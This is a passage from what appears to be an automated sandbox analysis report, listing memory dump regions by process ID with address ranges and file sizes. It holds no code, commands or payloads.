                                                                                                                                                            • memory/5756-161-0x0000000000950000-0x0000000000B8D000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.2MB

                                                                                                                                                            • memory/5756-164-0x00000000735B0000-0x00000000735FF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              316KB

                                                                                                                                                            • memory/5756-165-0x00007FFCA4E10000-0x00007FFCA5005000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                            • memory/5756-157-0x0000000000560000-0x00000000005FE000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              632KB

                                                                                                                                                            • memory/5756-216-0x00000000735B0000-0x00000000735FF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              316KB

                                                                                                                                                            • memory/5816-527-0x0000000000970000-0x0000000000BAD000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.2MB

                                                                                                                                                            • memory/5816-526-0x00000000008D0000-0x000000000096E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              632KB

                                                                                                                                                            • memory/5816-528-0x00000000735B0000-0x00000000735FF000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              316KB

                                                                                                                                                            • memory/5816-531-0x00007FFCA4E10000-0x00007FFCA5005000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                            • memory/5992-182-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              400KB

                                                                                                                                                            • memory/5992-181-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              400KB

                                                                                                                                                            • memory/6104-16-0x0000000006130000-0x0000000006484000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.3MB

                                                                                                                                                            • memory/6104-2-0x0000000003030000-0x0000000003066000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              216KB

                                                                                                                                                            • memory/6104-17-0x00000000065E0000-0x00000000065FE000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              120KB

                                                                                                                                                            • memory/6104-3-0x0000000005800000-0x0000000005E28000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.2MB

                                                                                                                                                            • memory/6104-6-0x0000000005FC0000-0x0000000006026000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              408KB

                                                                                                                                                            • memory/6104-5-0x0000000005EE0000-0x0000000005F46000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              408KB

                                                                                                                                                            • memory/6104-4-0x0000000005740000-0x0000000005762000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              136KB

                                                                                                                                                            • memory/6104-18-0x0000000006610000-0x000000000665C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              304KB

                                                                                                                                                            • memory/6104-19-0x0000000007F20000-0x000000000859A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.5MB

                                                                                                                                                            • memory/6104-20-0x0000000006B20000-0x0000000006B3A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              104KB

                                                                                                                                                            • memory/6104-22-0x0000000007B40000-0x0000000007BD6000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              600KB

                                                                                                                                                            • memory/6104-23-0x0000000007AD0000-0x0000000007AF2000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              136KB

                                                                                                                                                            • memory/6104-24-0x0000000008B50000-0x00000000090F4000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.6MB

                                                                                                                                                            • memory/6132-327-0x000000000F230000-0x000000000F26C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              240KB

                                                                                                                                                            • memory/6132-318-0x0000000008DD0000-0x0000000008DDA000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/6132-266-0x0000000007FF0000-0x00000000080E8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              992KB

                                                                                                                                                            • memory/6132-259-0x0000000006460000-0x00000000067B4000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.3MB

                                                                                                                                                            • memory/6132-326-0x000000000F1D0000-0x000000000F1E2000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/6132-323-0x000000000EB20000-0x000000000EB6E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              312KB

                                                                                                                                                            • memory/6132-322-0x000000000D880000-0x000000000DA42000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.8MB

                                                                                                                                                            • memory/6132-261-0x0000000006A20000-0x0000000006A6C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              304KB

                                                                                                                                                            • memory/6132-263-0x0000000007DA0000-0x0000000007E32000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              584KB

                                                                                                                                                            • memory/6132-321-0x000000000D5F0000-0x000000000D6A2000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              712KB

                                                                                                                                                            • memory/6132-265-0x0000000003440000-0x0000000003448000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              32KB

                                                                                                                                                            • memory/6132-316-0x0000000008B30000-0x0000000008C84000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.3MB

                                                                                                                                                            • memory/6132-317-0x00000000058D0000-0x00000000058EA000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              104KB

                                                                                                                                                            • memory/6132-320-0x000000000D4E0000-0x000000000D530000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              320KB

                                                                                                                                                            • memory/6348-4561-0x000002867FF80000-0x000002867FF9C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/6348-4562-0x000002867FF60000-0x000002867FF6A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/6348-4563-0x0000028618FE0000-0x0000028618FE8000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              32KB

                                                                                                                                                            • memory/6348-4564-0x000002867FF70000-0x000002867FF7A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/6924-4567-0x0000000000E30000-0x00000000012F5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.8MB

                                                                                                                                                            • memory/6924-4572-0x0000000000E30000-0x00000000012F5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.8MB

                                                                                                                                                            • memory/7132-1674-0x0000000006FB0000-0x0000000007053000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              652KB

                                                                                                                                                            • memory/7132-1663-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              304KB

                                                                                                                                                            • memory/7132-1664-0x000000006F1A0000-0x000000006F4F4000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.3MB

                                                                                                                                                            • memory/7132-1689-0x0000000007270000-0x0000000007284000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                            • memory/7132-1676-0x0000000007240000-0x0000000007251000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              68KB

                                                                                                                                                            • memory/7660-22017-0x00000259E9390000-0x00000259E939A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/7660-22018-0x00000259E9830000-0x00000259E984A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              104KB

                                                                                                                                                            • memory/7660-22015-0x00000259E95B0000-0x00000259E95CC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/7660-22016-0x00000259E95D0000-0x00000259E9685000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              724KB

                                                                                                                                                            • memory/8020-21979-0x0000000006830000-0x0000000006910000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              896KB

                                                                                                                                                            • memory/8020-22164-0x0000000007920000-0x00000000079FE000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              888KB

                                                                                                                                                            • memory/8020-21851-0x0000000005220000-0x00000000052E4000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              784KB

                                                                                                                                                            • memory/8020-21850-0x0000000002FB0000-0x0000000003006000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              344KB

                                                                                                                                                            • memory/8020-21969-0x0000000006330000-0x000000000640E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              888KB